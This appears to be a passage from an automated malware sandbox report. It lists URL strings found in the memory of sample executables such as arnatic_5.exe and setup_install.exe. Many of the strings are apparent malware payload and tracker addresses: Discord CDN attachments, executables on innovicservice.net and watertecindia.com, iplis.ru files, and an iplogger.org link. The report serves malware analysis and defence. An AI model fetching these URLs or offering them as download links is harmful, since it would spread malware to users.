binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931475805228371968/1234_1401.bmp
Source: arnatic_5.exe, 00000013.00000003.443520431.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422902961.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422350893.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432896425.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367525181.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432489653.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.380504777.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443991618.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366988052.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427722552.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379788149.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427259998.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368354366.0000000006529000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931475805228371968/1234_1401.bmpC
Source: arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931475805228371968/1234_1401.bmpW
Source: arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931494519592075284/27f_1401.bmp
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931494519592075284/27f_1401.bmpbe
Source: arnatic_5.exe, 00000013.00000003.390898314.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931559821109493760/redcappes_crypted.bm
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com:80/attachments/910842184708792331/931600723630764112/real1401.bmp
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291491317.0000000002B50000.00000004.00000001.sdmp, setup_install.exe, 00000007.00000002.304636347.000000006B4CC000.00000040.00020000.sdmp	String found in binary or memory: https://curl.se/V
Source: setup_install.exe, 00000007.00000002.304593734.000000006B49E000.00000002.00020000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291491317.0000000002B50000.00000004.00000001.sdmp, setup_install.exe, 00000007.00000002.304636347.000000006B4CC000.00000040.00020000.sdmp	String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: setup_install.exe, 00000007.00000003.295710094.0000000002710000.00000004.00000001.sdmp, setup_install.exe, 00000007.00000002.304593734.000000006B49E000.00000002.00020000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp, arnatic_5.exe, 00000013.00000000.302483192.0000000000EBB000.00000002.00020000.sdmp	String found in binary or memory: https://db-ip.com/Entry
Source: setup_install.exe, 00000007.00000003.295885776.0000000002710000.00000004.00000001.sdmp	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456885585.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/
Source: arnatic_5.exe, 00000013.00000003.427047961.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389209367.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443791496.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.409965913.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480665699.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422152570.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386699379.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432699630.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443329900.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417450531.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427504091.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422705718.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456966893.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432312491.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489778970.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exe
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeC:
Source: arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeI
Source: arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeJ
Source: arnatic_5.exe, 00000013.00000003.389209367.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386699379.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr758214.exeo
Source: arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exe
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeC:
Source: arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeI
Source: arnatic_5.exe, 00000013.00000003.427047961.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389209367.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443791496.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.409965913.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404326584.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393435775.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422152570.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386699379.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390959002.00000000064DA000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432699630.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443329900.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417450531.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427504091.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422705718.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456966893.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432312491.00000000064D6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379380319.00000000064DA000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr943210.exeg
Source: arnatic_5.exe, 00000013.00000003.366605195.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367209986.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: https://innovicservice.net:80/
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp, arnatic_5.exe, 00000013.00000000.302483192.0000000000EBB000.00000002.00020000.sdmp	String found in binary or memory: https://ipgeolocation.io/Content-Type:
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp, arnatic_5.exe, 00000013.00000000.302483192.0000000000EBB000.00000002.00020000.sdmp	String found in binary or memory: https://ipinfo.io/:Content-Type:
Source: arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp	String found in binary or memory: https://iplis.ru/
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://iplis.ru/1G8Fx7.mp3
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://iplis.ru/1S3fd7.mp3
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: https://iplis.ru/1S3fd7.mp3s
Source: arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp	String found in binary or memory: https://iplis.ru/ar1
Source: arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp	String found in binary or memory: https://iplis.ru/tr
Source: arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp	String found in binary or memory: https://iplis.ru/xs
Source: arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	String found in binary or memory: https://iplis.ru:443/1G8Fx7.mp3tData.phpr
Source: arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	String found in binary or memory: https://iplis.ru:443/1S3fd7.mp3
Source: arnatic_5.exe, 00000013.00000003.377558259.00000000065CD000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388114917.00000000078F9000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1epKp7http://watertecindia.com/watertec/fw%d.exehttp://watertecindia.com/watert
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp	String found in binary or memory: https://s.lletlee.com/tmp/aaa_v002.dllxxxxxxxxxxxxxxxxxxxH
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000000.326086475.0000000003520000.00000004.00000001.sdmp	String found in binary or memory: https://sslamlssa1.tumblr.com/
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp	String found in binary or memory: https://sslamlssa1.tumblr.com/g
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456885585.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://watertecindia.com/
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456885585.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: https://watertecindia.com/W
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://watertecindia.com/watertec/f.exe
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: https://watertecindia.com/watertec/f.exeC:
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	String found in binary or memory: https://watertecindia.com/watertec/f.exeh
Source: arnatic_5.exe, 00000013.00000003.409993066.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481318981.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393463301.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427086754.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456992136.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422737689.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432338816.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432737345.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443820817.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443352919.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427534412.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417510636.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404358539.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480687537.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422178546.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489805744.00000000064E2000.00000004.00000001.sdmp	String found in binary or memory: https://watertecindia.com:80/watertec/f.exe
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp	String found in binary or memory: https://watertecindia.com:80/watertec/f.exee
Source: setup_install.exe, 00000007.00000002.304418108.0000000002714000.00000004.00000001.sdmp, setup_install.exe, 00000007.00000002.304171315.000000000071C000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488002533.0000000000EBB000.00000002.00020000.sdmp, arnatic_5.exe, 00000013.00000000.302483192.0000000000EBB000.00000002.00020000.sdmp	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address//ids0Content-Type:
Source: arnatic_3.exe, 0000000F.00000000.325038135.0000000000DA5000.00000004.00000001.sdmp	String found in binary or memory: https://www.tumblr.com
Source: arnatic_3.exe, 0000000F.00000002.445930986.00000000028E0000.00000004.00000040.sdmp, arnatic_3.exe, 0000000F.00000000.316865922.000000000019A000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000000.325038135.0000000000DA5000.00000004.00000001.sdmp	String found in binary or memory: https://www.tumblr.com/explore?referer=404
Source: arnatic_3.exe, 0000000F.00000000.325038135.0000000000DA5000.00000004.00000001.sdmp	String found in binary or memory: https://www.tumblr.com/login
Source: arnatic_3.exe, 0000000F.00000000.326086475.0000000003520000.00000004.00000001.sdmp	String found in binary or memory: https://www.tumblr.com/policy/en/privacy
Source: arnatic_3.exe, 0000000F.00000000.325038135.0000000000DA5000.00000004.00000001.sdmp	String found in binary or memory: https://www.tumblr.com/register
